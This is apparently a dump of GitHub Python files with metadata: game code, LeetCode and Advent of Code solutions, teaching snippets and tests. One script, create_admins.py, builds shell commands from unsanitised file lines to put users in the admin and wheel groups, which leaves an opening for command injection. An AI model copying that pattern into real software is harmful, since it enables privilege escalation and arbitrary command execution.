delay( 5 )\n \n #finsh all tasks\n elif listIndex == len(moveList):\n displayVideo( previousePlayerPosition, taskPosition, taksSpikes, taskVideo )\n \n #reset var\n spotLis = []\n listIndex = 0\n displayVideoFlag = False\n getInput = True\n\n #rest position \n clearTaskSpikes( taksSpikes )\n player.setPosition( spots[ 'cafereria' ] )\n \n delay( DELAY_TIME )\n\n #move player\n else:\n player.setPosition( moveList[ listIndex ] )\n playerPosition = player.getPosition()\n\n #player at task\n if playerPosition in taskPosition:\n previousePlayerPosition = playerPosition\n displayVideoFlag = True\n\n elif( displayVideoFlag == True):\n displayVideo( previousePlayerPosition, taskPosition, taksSpikes, taskVideo )\n displayVideoFlag = False\n\n for task in range( len(taskPosition) ):\n taksSpikes[ task ].setPosition( taskPosition[task] )\n \n listIndex += 1\n\n delay( DELAY_TIME )\n\n all_sprites.update()\n \n screen.blit(bg_surface, (0,0))\n all_sprites.draw( screen )\n \n pygame.display.update()\n \n clock.tick( 1 )\n","repo_name":"Titivat/AStartAmongUs","sub_path":"UI.py","file_name":"UI.py","file_ext":"py","file_size_in_byte":8794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72329905388","text":"import os\r\nimport linecache\r\n\r\nadmin = open(\"admin_users.txt\",\"w\")\r\nfile = \"users.txt\"\r\nln = 1\r\n\r\nwhile ln < 21:\r\n line = linecache.getline(file, ln).strip()\r\n admin.write(line + '\\n')\r\n os.system(\"usermod -a -G admin,wheel \" + line)\r\n ln +=1\r\n\r\nadmin.close()\r\n\r\n\r\n","repo_name":"SCary120/Linux-Admin-Portfolio","sub_path":"create_admins.py","file_name":"create_admins.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16429377637","text":"class Solution:\n def countSubstrings(self, s: str) -> int:\n # number of the palindromic substrings\n res = [0]\n for i in range(len(s)):\n # make the current as the centre of our palindrome and then loop going outwards\n # odd length, get alll odd strings\n l,r = i, i\n self.helper(l, r, s, res)\n \n # even length\n l,r = i, i+1\n self.helper(l, r, s, res)\n return res[0]\n\n def helper(self, l, r, s, res):\n while l >= 0 and r < len(s) and s[l] == s[r]:\n res[0] += 1\n l -= 1\n r += 1","repo_name":"b0nbon1/dope-stuff","sub_path":"extras/quick-prep-75/palindromic-substrings.py","file_name":"palindromic-substrings.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"40124108137","text":"import os, sys\nimport re\nimport string\nimport glob\nimport shutil\n\n\n# function that clean script name for readability\ndef clean_script_name(content):\n # ----\n # format filename for readability\n # ----\n title = content.replace('_', ' ').capitalize()\n\n for k, v in abbv.items():\n title = re.sub(r'\\b{}\\b'.format(k), f'{v}', title)\n title = re.sub(r'\\b{}\\b'.format(k.capitalize()), f'{v}', title)\n\n title = re.sub(r'\\b{}s\\b'.format(k), f'{v}s', title)\n title = re.sub(r'\\b{}s\\b'.format(k.capitalize()), f'{v}s', title)\n\n for letter in letter_l:\n title = re.sub(r'\\b{}\\b'.format(letter), letter.upper(), title)\n\n return title\n\n\nheader = ('analytics'\n , 'automation'\n , 'cleaning'\n , 'database'\n , 'extraction'\n , 'reporting'\n , 'automation'\n , 'integration'\n , 'modeling'\n , 'OS'\n , 'visualization'\n , 'raw_data'\n , 'output'\n , 'fun-code'\n)\nabbv = 
{\n 'w': 'with'\n , 'n': 'and'\n , 'linux': 'Linux'\n , 'windows': 'Windows'\n , 'icd': 'ICD'\n , 'icd9': 'ICD-9'\n , 'icd10': 'ICD-10'\n , 'json': 'JSON'\n , 'csv': 'CSV'\n , 'vs': 'vs.'\n , 'api': 'API'\n , 'w9': 'W-9'\n , 'ocr': 'OCR'\n , 'id': 'ID'\n , 'postgresql': 'PostgreSQL'\n , 'asc': 'ASC'\n , 'x12': 'X12'\n , 'nlp': 'NLP'\n , 'scp': 'SCP'\n , 'ssh': 'SSH'\n , 'excel': 'Excel'\n , 'state': 'State'\n , 'npi': 'NPI'\n , 'city': 'City'\n , 'usps': 'USPS'\n , 'datetime': 'DateTime in specified timezone'\n , 'reg': 'Regression'\n , 'knn': 'KNN'\n , 'temp': 'temporary'\n , 'states': 'States'\n , 'barplot': 'Barplot'\n , 'us': 'US'\n , 'nyc': 'NYC'\n , 'pic': 'picture'\n , 'exe': 'Exe'\n , 'dup': 'duplicate'\n , 'pdf': 'PDF'\n , 'desktop': 'Desktop'\n}\n\nletter_l = list(string.ascii_lowercase)\npwd = os.getcwd()\n\n\n#----\n# grep only relevant files for processing\n#----\nscript_d = {}\n\nfor raw in glob.glob('*.*'):\n sep = raw.split('__')\n\n for head in header:\n for ele in sep:\n if head == ele:\n script_d[raw] = 1\n\n# [print(k) for k in script_d]\n\n\nfor head in header:\n for f in glob.glob(f'{pwd}\\{head}\\*.*'):\n if '.md' not in f:\n os.remove(f)\n\n\nreadme_d = {}\n\nfor script in script_d:\n print(script)\n #----\n # separate category header\n #----\n sep = script.split('__')\n\n # category to put script into folder\n script_header = sep[:-1]\n\n # script name to be formatted for readability\n content = sep[-1]\n # print(content)\n\n #----\n # clean script name for readability\n #----\n title = clean_script_name(content)\n\n #----\n # put script into folder with path according to header list and name according to content\n #----\n\n\n src = rf'{pwd}\\{script}'\n\n for script_head in script_header:\n des = rf'{pwd}\\{script_head}\\{content}'\n\n shutil.copy(src, des)\n\n print('->' + f'...\\{script_head}\\{content}')\n\n if 'Config.py' not in title:\n readme_d[f'{script_head}|{title}'] = 1\n\n\n print()\n print(title)\n\n\n print('-' * 150)\n\n\n# print(readme_d)\n#----\n# edit readme files with readable file names\n#----\nfor head in header:\n with open(rf'{pwd}\\{head}\\README.md', 'w') as fw:\n print('# Scripts for {}'.format(head.capitalize()), file=fw )\n for k in readme_d:\n script_head = k.split('|')[0]\n title = k.split('|')[1]\n\n if head == script_head:\n print(title + '\\n', file=fw)\n","repo_name":"jameswniu/fun-code","sub_path":"sort_files_into_folders_write_readme_refine_script_name_for_readability.py","file_name":"sort_files_into_folders_write_readme_refine_script_name_for_readability.py","file_ext":"py","file_size_in_byte":3577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7960875654","text":"#yield\ndef filter_numbers(predicate):\n for i in range(0, 100):\n if predicate(i):\n yield i\n\nnumbers = filter_numbers(lambda n: n % 2 == 0)\nfor n in numbers:\n print(n)\n\t\n#Classes\n\nclass ShoppingCart:\n\n def __init__(self):\n self.items = []\n\n def addItems(self, name, price):\n self.items.append((name,price))\n\n def __iter__(self):\n return self.items.__iter__()\n\nif __name__ == \"__main__\":\n cart = ShoppingCart()\n cart.addItems('xbox', 500)\n cart.addItems('playstation', 400)\n\n for item in cart:\n print(item)\n\t\t\n#lambda\ndef add(x,y):\n return x + y\n\nc = add(5, 6)\nprint(c)\n\n# lambda\nadd2 = lambda x, y: x + y\n\nc = add2(5, 6)\nprint(c)\n\n#functions\ndef banner(message, border=\"-\"):\n banner = border * len(message)\n print(banner)\n print(message)\n print(banner)\n\nnumbers 
= [1, 2, 3, 4, 5, 6]\n\nfor n in numbers:\n print(n, end=', ')\n\t\n#Decorators\nimport functools\nimport time\n\ndef timer(func):\n @functools.wraps(func)\n def wrapper_decorator(*args, **kwargs):\n # Do something before\n start_time = time.perf_counter() \n\n value = func(*args, **kwargs)\n \n # Do something after\n end_time = time.perf_counter()\n run_time = end_time - start_time\n print(f\"Finished {func.__name__!r} in {run_time:.4f} secs\")\n return value\n return wrapper_decorator\n\n\n@timer\ndef waste_some_time(num_times):\n for _ in range(num_times):\n sum([i**2 for i in range(10000)])\n\n#except\ndef test():\n while True:\n try:\n x = int(input(\"Please enter a number: \"))\n break\n except ValueError:\n print(\"Oops! That was no valid number. Try again...\")\n finally:\n print(\"I always execute\")\n\n#context managers\nclass File():\n\n def __init__(self, filename, mode):\n self.filename = filename\n self.mode = mode\n\n def __enter__(self):\n self.open_file = open(self.filename, self.mode)\n return self.open_file\n\n def __exit__(self, *args):\n self.open_file.close()\n\nfiles = []\nfor _ in range(10000):\n with File('foo.txt', 'w') as infile:\n infile.write('foo')\n files.append(infile)\n\n# Async/Await\n# pip install aiohttp\nimport signal \nimport sys \nimport asyncio \nimport aiohttp \nimport json\n\nloop = asyncio.get_event_loop() \nclient = aiohttp.ClientSession(loop=loop)\n\nasync def get_json(client, url): \n async with client.get(url) as response:\n assert response.status == 200\n return await response.read()\n\nasync def get_reddit_top(subreddit, client): \n data1 = await get_json(client, 'https://www.reddit.com/r/' + subreddit + '/top.json?sort=top&t=day&limit=5')\n\n j = json.loads(data1.decode('utf-8'))\n for i in j['data']['children']:\n score = i['data']['score']\n title = i['data']['title']\n link = i['data']['url']\n print(str(score) + ': ' + title + ' (' + link + ')')\n\n print('DONE:', subreddit + '\\n')\n\ndef signal_handler(signal, frame): \n loop.stop()\n client.close()\n sys.exit(0)\n\nsignal.signal(signal.SIGINT, signal_handler)\n\nasyncio.ensure_future(get_reddit_top('python', client)) \nasyncio.ensure_future(get_reddit_top('programming', client)) \nasyncio.ensure_future(get_reddit_top('compsci', client)) \nloop.run_forever() ","repo_name":"janierdavila/python-for-dot-net-devs-talk","sub_path":"all_python_examples.py","file_name":"all_python_examples.py","file_ext":"py","file_size_in_byte":3337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11630535997","text":"from dlc2action.project import Project\nimport pytest\nimport os\nfrom pathlib import Path\n\n\ndef test_delete():\n \"\"\"\n Test `dlc2action.project.project.Project.evaluate`\n\n Check that everything runs successfully.\n \"\"\"\n\n path = os.path.join(os.path.dirname(__file__), \"data\")\n\n Project.remove_project(\"test_delete_datasets\")\n project_path = os.path.join(str(Path.home()), \"DLC2Action\", \"test_delete_datasets\")\n assert not os.path.exists(project_path)\n project = Project(\n \"test_delete_datasets\",\n data_type=\"dlc_track\",\n annotation_type=\"csv\",\n data_path=path,\n annotation_path=path,\n )\n project.update_parameters(\n {\n \"data\": {\n \"data_suffix\": \"DeepCut_resnet50_Blockcourse1May9shuffle1_1030000.csv\", # set; the data files should have the format of {video_id}{data_suffix}, e.g. 
video1_suffix.pickle, where video1 is the video is and _suffix.pickle is the suffix\n \"canvas_shape\": [1000, 500], # list; the size of the canvas where the pose was defined\n \"annotation_suffix\": \".csv\", # str | set, optional the suffix or the set of suffices such that the annotation files are named {video_id}{annotation_suffix}, e.g, video1_suffix.pickle where video1 is the video id and _suffix.pickle is the suffix\n \"fps\": 25,\n },\n \"general\": {\n \"exclusive\": True, # bool; if true, single-label classification is used; otherwise multi-label\n \"only_load_annotated\": True,\n \"metric_functions\": {\"f1\"}\n }, \n \"training\": {\n \"partition_method\": \"time:strict\", \n \"val_frac\": 0.5, \n \"normalize\": False,\n \"num_epochs\": 1,\n }\n }\n )\n project.run_episode(\"first\")\n project.run_episode(\n \"second\",\n parameters_update={\"general\": {\"overlap\": 50}},\n remove_saved_features=True,\n )\n assert len(os.listdir(os.path.join(project.project_path, \"saved_datasets\"))) == 2\n project.remove_saved_features()\n assert len(os.listdir(os.path.join(project.project_path, \"saved_datasets\"))) == 0\n Project.remove_project(\"test_delete_datasets\")\n\n\n# test_delete()\n","repo_name":"amathislab/DLC2action","sub_path":"tests/test_delete_datasets.py","file_name":"test_delete_datasets.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"37"} +{"seq_id":"38655855026","text":"from functools import reduce\nfrom operator import xor\nfrom collections import deque\n\nlist_size=256\nbit_size=128\n\ndef knot_hash(input):\n lst = [i for i in range(0, list_size)]\n current_pos = lst[0]\n skip = 0\n lengths = [ord(i) for i in input]\n lengths.extend([17, 31, 73, 47, 23])\n for j in range(64):\n for l in lengths:\n last_i = current_pos + l\n rem = last_i - list_size\n r = []\n if rem > 0:\n for i in range(current_pos, list_size):\n r.append(lst[i])\n for i in range(0, min(rem, current_pos)):\n r.append(lst[i])\n for i in range(current_pos, list_size):\n lst[i] = r.pop()\n for i in range(0, rem):\n lst[i] = r.pop()\n else:\n rem = last_i\n lst[current_pos:last_i] = reversed(lst[current_pos:last_i])\n \n new_pos = rem + skip\n while new_pos >= list_size:\n new_pos -= list_size\n \n current_pos = new_pos\n skip += 1\n \n dense_hash = []\n for i in range(0, list_size, 16):\n res = reduce(xor, lst[i: i+16])\n dense_hash.append(res)\n \n \n hex_str = ''\n for d in dense_hash:\n if len(hex(d)[2:]) != 2:\n hex_str += '0'\n hex_str += hex(d)[2:]\n \n b = bin(int(hex_str, 16))[2:].zfill(bit_size)\n return b\n\ndef part1(data):\n num_used = 0\n for i in range(bit_size):\n b = knot_hash(data + str(i))\n num_used += b.count(\"1\")\n return num_used\n\ndef get_adj_cells(row, col):\n res = []\n if row != 0:\n res.append((row - 1, col))\n if row != 127:\n res.append((row + 1, col))\n if col != 0:\n res.append((row, col - 1))\n if col != 127:\n res.append((row, col + 1))\n return res\n\ndef part2(data):\n grid = []\n for i in range(bit_size):\n b = knot_hash(data + str(i))\n grid.append(list(b))\n regions = 0\n visited = set()\n for r in range(bit_size):\n for c in range(bit_size):\n if (r, c) in visited or grid[r][c] != \"1\":\n continue\n regions += 1\n stack = deque([(r, c)])\n while stack:\n row, col = stack.popleft()\n visited.add((row, col))\n res = get_adj_cells(row, col)\n for (rr, cc) in res:\n if (rr, cc) not in visited and grid[rr][cc] == \"1\":\n stack.append((rr, cc))\n return 
regions","repo_name":"Panda4817/Advent-of-Code-2017","sub_path":"14.py","file_name":"14.py","file_ext":"py","file_size_in_byte":2601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17034533481","text":"'''\nYou are given a number ‘n’. You have to tell whether a number is great or not. A great number is a number whose sum of digits let (m) and product of digits let(j) when summed together gives the number back\n\nm+j=n\n\n \n\nInput Description:\nYou are given a number n;\n\nOutput Description:\nPrint Great if a number is great else print the no\n\nSample Input :\n59\nSample Output :\nGreat\n'''\n\nui = int(input())\nsum = 0\nprod = 1\nfor digit in str(ui): sum += int(digit)\nfor digit in str(ui): prod *= int(digit)\nif sum+prod==ui: print(\"Great\")\nelse: print(\"no\")\n","repo_name":"alloc7260/GUVI-code-practice","sub_path":"CODEKATA/Numbers/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31102399585","text":"#Faça um programa que calcule o MMC (mínimo múltiplo comum) entre dois números.\n\na, b = input().split()\na, b = int(a), int(b)\na, b = max(a,b), min(a,b)\nfor i in range (1,b+1):\n if 0 == (a*i)%b:\n m = a*i\n break\nprint(m)\n","repo_name":"Matheus-616/Stepik","sub_path":"lista3: estruturas de repetição/L3Q8.py","file_name":"L3Q8.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34425170978","text":"# link : https://leetcode.com/problems/add-two-numbers-ii/description/\n# author : Mohamed Ibrahim\nclass Solution:\n def helper(self, l1: ListNode, l2: ListNode) -> ListNode:\n stack1 = []\n stack2 = []\n\n while l1:\n stack1.append(l1.val)\n l1 = l1.next\n\n while l2:\n stack2.append(l2.val)\n l2 = l2.next\n\n result = None\n carry = 0\n\n while stack1 or stack2 or carry:\n digit1 = stack1.pop() if stack1 else 0\n digit2 = stack2.pop() if stack2 else 0\n\n total = digit1 + digit2 + carry\n digit = total % 10\n carry = total // 10\n\n newNode = ListNode(digit)\n newNode.next = result\n result = newNode\n\n return result\n\n def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:\n ans = self.helper(l1, l2)\n return ans\n","repo_name":"M0hamedIbrahim1/-Data-Structure-Algorithms","sub_path":"LinkedList/Problems/445. Add Two Numbers II.py","file_name":"445. 
Add Two Numbers II.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"22872551647","text":"from __future__ import absolute_import\n\nfrom celery import shared_task\nfrom celery import Task\nfrom jhtdb.jhtdblib import JHTDBLib\nfrom jhtdb.jhtdblib import CutoutInfo\nfrom jhtdb.hdfdata import HDFData\nfrom jhtdb.vtkdata import VTKData\n\n\n@shared_task\ndef add(x, y):\n return x + y\n\n\n@shared_task\ndef mul(x, y):\n return x * y\n\n\n@shared_task\ndef xsum(numbers):\n return sum(numbers)\n\nclass Getbigcutout(Task):\n\n def __init__(self):\n self.progress = 0\n\n def run(self, webargs, ipaddr):\n print(\"Task begin\")\n self.update_state(state='PROGRESS', meta={'cubes': 0, 'percent': 0})\n ci = CutoutInfo()\n ci.ipaddr = ipaddr\n jhlib = JHTDBLib()\n #Parse web args into cutout info object\n ci=jhlib.parsewebargs(webargs)\n ci.persistance = 1\n #Verify token (remove in the future--handled by stored procedure now.\n print (\"Checking token\")\n isValid, limit = jhlib.verify(ci.authtoken,1)\n if isValid:\n if (ci.filetype == \"vtk\"):\n #vtkfile = VTKData().getvtk(ci) #Note: This could be a .vtr, .vti, or .zip depending on the request!\n #Set the filename to the dataset name, and the suffix to the suffix of the temp file\n #response['Content-Disposition'] = 'attachment;filename=' + ci.dataset +'.' + vtkfile.name.split('.').pop()\n #Since VTK can have different file types, getvtk makes those decisions and returns the HTTP response with the correct file info.\n response = VTKData().getvtk(ci)\n print(\"Got vtk response\")\n else:\n #Serve up an HDF5 file\n path = '/var/www/cutoutcache/'\n h5file = HDFData().gethdf(ci, self)\n filename = ci.dataset + \"_\" + ci.authtoken + \".h5\"\n #f = h5py.File(filename, 'w')\n #copy the tempfile to the permanent file\n #shutil.copy(h5file.name, path + filename)\n print (\"Saved HDF file\")\n return filename\n else:\n response = HttpResponse(\"Error: token is invalid\")\n #request.session['download_progress'] = 100 #test for progress bar. 
Should update based on cutout\n print(\"returning response\")\n return response\n\n","repo_name":"idies/Turbulence","sub_path":"Cutout_Webservice/jhtdb/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"}
+{"seq_id":"26055209074","text":"# N and M 9 B_15663\n# Corresponds to (5) # N natural numbers (not 'distinct natural numbers', so duplicates may appear)\n# But the problem does not change\n# Method 1: solution of problem (5) + duplicate removal\n\n# Method 2: solve in one go with a recursive function\n# Count occurrences of each number + remove duplicates\nimport sys\nfrom collections import Counter\nn, m = map(int, input().split())\ntemp = list(map(int, input().split()))\n\n# Counter counts the occurrences of each element\n# ex) temp = [9, 7, 9, 1]\n# using Counter alone gives [9,7,1]\n# Counter(temp).items() = [(9,2), (7,1), (1,1)]\ntemp = list(Counter(temp).items())\ntemp.sort()\n\nn = len(temp)\nnum, cnt = map(list, zip(*temp))\n# print(num) # num = [1,7,9]\n# print(cnt) # cnt = [1,1,2]\na = [0]*m # array that holds the answer\n\ndef solution(index, n, m):\n if index == m:\n sys.stdout.write(' '.join(map(str, a)) + '\\n')\n return\n for i in range(n):\n if cnt[i] > 0:\n cnt[i] -= 1\n a[index] = num[i]\n solution(index+1, n, m)\n cnt[i] += 1\n\n\nsolution(0,n,m)\n\n\n\n","repo_name":"snowedev/baekjoon-code.plus","sub_path":"baekjoon/[Bruteforce]/기초/[N과M]/[N과M](9).py","file_name":"[N과M](9).py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"37284608695","text":"class Solution:\n def toGoatLatin(self, S):\n \"\"\"\n :type S: str\n :rtype: str\n \"\"\"\n vowels=('a','e','i','o','u','A','E','I','O','U')\n res=[]\n words=S.split()\n for index,word in enumerate(words):\n if word[0] in vowels:\n res.append(word+\"ma\"+'a'*(index+1))\n else:\n res.append(word[1:]+word[0]+\"ma\"+'a'*(index+1))\n return \" \".join(res)\n\n\ns=Solution()\nprint(s.toGoatLatin(\"I speak Goat Latin\"))\n","repo_name":"jiangshshui/leetcode","sub_path":"seventeenthPage/824_GoatLatin.py","file_name":"824_GoatLatin.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"1704831423","text":"import serial # import Serial Library\nimport numpy # Import numpy\nimport matplotlib.pyplot as plt #import matplotlib library\nimport datetime\n\nfrom drawnow import *\n\nhum=[]\ntemp= []\nheatin= []\nmoist= []\n\narduinoData = serial.Serial('/dev/ttyACM0', 115200) #Creating our serial object named arduinoData\nplt.ion() #Tell matplotlib you want interactive mode to plot live data\ncnt=0\n\ndef makeFig(): #Create a function that makes our desired plot\n# plt.ylim(80,90) #Set y min and max values\n plt.title('My Live Streaming Sensor Data') #Plot the title\n plt.grid(True) #Turn the grid on\n plt.ylabel('Temp C') #Set ylabels\n plt.plot(temp, 'ro-', label='Degrees C') #plot the temperature\n plt.legend(loc='upper left') #plot the legend\n plt2=plt.twinx() #Create a second y axis\n# plt.ylim(93450,93525) #Set limits of second y axis- adjust to readings you are getting\n plt2.plot(hum, 'b^-', label='Relative Humidity (%)') #plot pressure data\n plt2.set_ylabel('Relative Humidity (%)') #label second y axis\n# plt2.ticklabel_format(useOffset=False) #Force matplotlib to NOT autoscale y axis\n plt2.legend(loc='upper right') #plot the legend\n \n\ninfile = open('data.csv', 'a')\n\ntry:\n while True: # While loop that loops forever\n while (arduinoData.inWaiting()==0): #Wait here until there is data\n pass #do nothing\n arduinoString = 
arduinoData.readline() #read the line of text from the serial port\n dataArray = arduinoString.split(',') #Split it into an array called dataArray\n h = float( dataArray[0]) \n t = float( dataArray[1]) \n hic = float( dataArray[2]) \n m = float( dataArray[3])\n\n hum.append(h)\n temp.append(t)\n heatin.append(hic)\n moist.append(m)\n\n row = datetime.datetime.now().strftime(\"%m-%d-%y,%H:%M:%S\") + ',' + str(h) + ',' + str(t) + ',' + str(hic) + ',' + str(m) +'\\n'\n infile.write(row)\n infile.flush()\n\n drawnow(makeFig)\n plt.pause(.001) #Pause Briefly. Important to keep drawnow from crashing\n cnt=cnt+1\n if(cnt>50): #If you have 50 or more points, delete the first one from the array\n hum.pop(0) #This allows us to just see the last 50 data points\n temp.pop(0)\n heatin.pop(0)\n moist.pop(0)\n\nexcept KeyboardInterrupt:\n infile.close()\n","repo_name":"NukeManDan/Arduino-work","sub_path":"MoistureHumiditySensor/MoistureHumiditySensor.py","file_name":"MoistureHumiditySensor.py","file_ext":"py","file_size_in_byte":2678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30802244098","text":"exercises = [\"squat\", \"leg press\", \"leg curl\", \"leg extension\",\"lunges\"]\n# print(exercises)\n# print(exercises[0])\n# print(exercises[-3])\n\n#****list methods**** \n# returns the item at indicated index item from the list\n# print(exercises.pop())\n# pass in item to append as the argument for the list\n# print value seperately from using append method print(list.append(\"foo\") does not return list it returns \"none\")\nexercises.append('front squat')\n# takes in two arguments, index position and value to add\nexercises.insert(1, ['array', 'string'])\nprint(exercises[1])\n\n\n","repo_name":"oagomezz/python-work","sub_path":"lists.py","file_name":"lists.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6224278996","text":"from psychopy import gui\r\n\r\n\r\n# 1) create subject lists\r\ndef randomlist():\r\n bio = [1, 2, 3, 4, 5, 6]\r\n psych = [7, 8, 9, 10, 11, 12]\r\n return bio, psych\r\n\r\n# 2) Initialize the gui windows, they well be updated later\r\n# define gui\r\nmyDlg = gui.Dlg(title=\"SFB_289\")\r\nmyDlgbio = gui.Dlg(title=\"Quiz\")\r\nmyDlgpsych = gui.Dlg(title=\"Quiz\")\r\n\r\n\r\n# 3) Adapt gui widows accordingly\r\ndef sub_id():\r\n myDlg.addField('Subject ID:')\r\n myDlg.addField('mzp:', )\r\n ok_data = myDlg.show() # show dialog and wait for OK or Cancel\r\n if myDlg.OK: # or if ok_data is not None\r\n print(ok_data)\r\n else:\r\n print('user cancelled')\r\n return ok_data\r\n\r\n\r\ndef quiz_bio():\r\n myDlgbio.addField('Frage 1:', choices =[\"A1\", \"A2\", \"A3\", \"A4\"])\r\n myDlgbio.addField('Frage 2:', choices =[\"A1\", \"A2\", \"A3\", \"A4\"])\r\n myDlgbio.addField('Frage 3:', choices=[\"A1\", \"A2\", \"A3\", \"A4\"])\r\n myDlgbio.addField('Frage 4:', choices=[\"A1\", \"A2\", \"A3\", \"A4\"])\r\n\r\n # show dialog and wait for OK or Cancel\r\n ok_databio = myDlgbio.show()\r\n\r\n # or if ok_data is not None\r\n if myDlgbio.OK:\r\n print(ok_databio)\r\n else:\r\n print('user cancelled')\r\n return ok_databio\r\n\r\n\r\ndef quiz_psych():\r\n myDlgpsych.addField('Frage 1:', choices=[\"A1\", \"A2\", \"A3\", \"A4\"])\r\n myDlgpsych.addField('Frage 2:', choices=[\"A1\", \"A2\", \"A3\", \"A4\"])\r\n myDlgpsych.addField('Frage 3:', choices=[\"A1\", \"A2\", \"A3\", \"A4\"])\r\n myDlgpsych.addField('Frage 4:', 
choices=[\"A1\", \"A2\", \"A3\", \"A4\"])\r\n\r\n # show dialog and wait for OK or Cancel\r\n ok_datapsych = myDlgpsych.show()\r\n\r\n # or if ok_data is not None\r\n if myDlgpsych.OK:\r\n print(ok_datapsych)\r\n else:\r\n print('user cancelled')\r\n return ok_datapsych\r\n","repo_name":"PhilLange/Explain_D","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32628971894","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 13 13:59:30 2017\n\n@author: Labvis\n\"\"\"\n\nimport numpy as np\nimport os\nimport scipy.linalg\n\n#A = np.asarray([[6.0, 3, 4, 8], [3, 6, 5, 1], [4, 5, 10, 7], [8, 1, 7, 25]])\n#A = np.asarray([[12.0, -51.0, 4], [6,167,-68], [-4, 24, -41]])\n\ndef QRdecomposition(A):\n\n test = A.copy()\n n = A.shape[0]\n m= A.shape[1]\n\n Qant = 0\n \n for i in range(m):\n c = test[i :,i]\n # if c.size == 0:\n# return Qant,Rant\n if i != 0:\n zeros = np.zeros(i)\n c = np.concatenate((zeros,c),axis = 0)\n \n v = np.asarray((c - np.dot(np.linalg.norm(c),np.eye(1,n,i)))).reshape(-1)\n #print(np.eye(1,n,i))\n H = np.eye(n)-2/np.dot(v,v)*(np.dot(v[:,None],v[None,:]))\n if i == 0:\n Q = H\n R = Q@A\n else:\n Q = Qant@H\n R = H@R\n #os.system(\"pause\")\n if istriu(R) == True and m!=n:\n break;\n test = R.copy()\n Qant = Q.copy()\n Rant = R.copy()\n Q = -1*Q\n R = -1*R \n return Q,R \n\ndef QReigenvalues(A): \n n,m = A.shape\n if n !=m:\n print(\"Insert a square matrix\")\n return 0\n while True:\n Q,R = QRdecomposition(A)\n Anew = R@Q\n \n if istriu(A) == True:\n return Anew\n else:\n A = Anew\n \n\ndef istriu(A):\n n,m = A.shape\n s=[]\n for i in range(n):\n for j in range(m):\n if j < i :\n s.append(A[i][j])\n if np.sum(s) < 0.0001:\n B = True\n else:\n B = False\n #print(s)\n return B\n\n#def QReigenvectors(A):\n ","repo_name":"GerardoFonteles/Mestrado","sub_path":"Algebra Linear/implementacao/QRdecomposition.py","file_name":"QRdecomposition.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42050123927","text":"from turtle import Turtle,Screen\nimport turtle\n\n\nscreen = Screen()\nscreen.setup(width=500,height=400)\nuserinput = screen.textinput(\"welcome to turtle race bet on your turtle\",\"type a color in small alphabet:\")\n\nimport random\n\nl = [\"red\",\"blue\",\"black\",\"orange\",\"yellow\",\"green\"]\n\nydistace = [-150,-100,-50,0,50,100]\nallturtle =[]\n\n\nfor i in range(6):\n\n newt = Turtle()\n newt.shape(\"turtle\")\n newt.color(l[i])\n newt.penup()\n newt.goto(-230, ydistace[i])\n\n\n allturtle.append(newt)\nprint(allturtle)\nif userinput:\n israceon = True\nwhile israceon:\n\n for turtlee in allturtle:\n if turtlee.xcor() > 230:\n israceon = False\n wit = turtlee.pencolor()\n winingcolor = wit\n if winingcolor == userinput:\n print(\"you win\")\n else:\n print(f\"youloss,{winingcolor} win\")\n else:\n\n turtlee.forward(random.randint(1,20))\n\n\np = Screen()\np.exitonclick()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"RajeevPrakashAD1/python_projects","sub_path":"turtle racingg/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20845343436","text":"\"\"\"Added one-to-many relationship\n\nRevision ID: 7557320529cc\nRevises: dd8e86966ba4\nCreate Date: 2021-11-25 
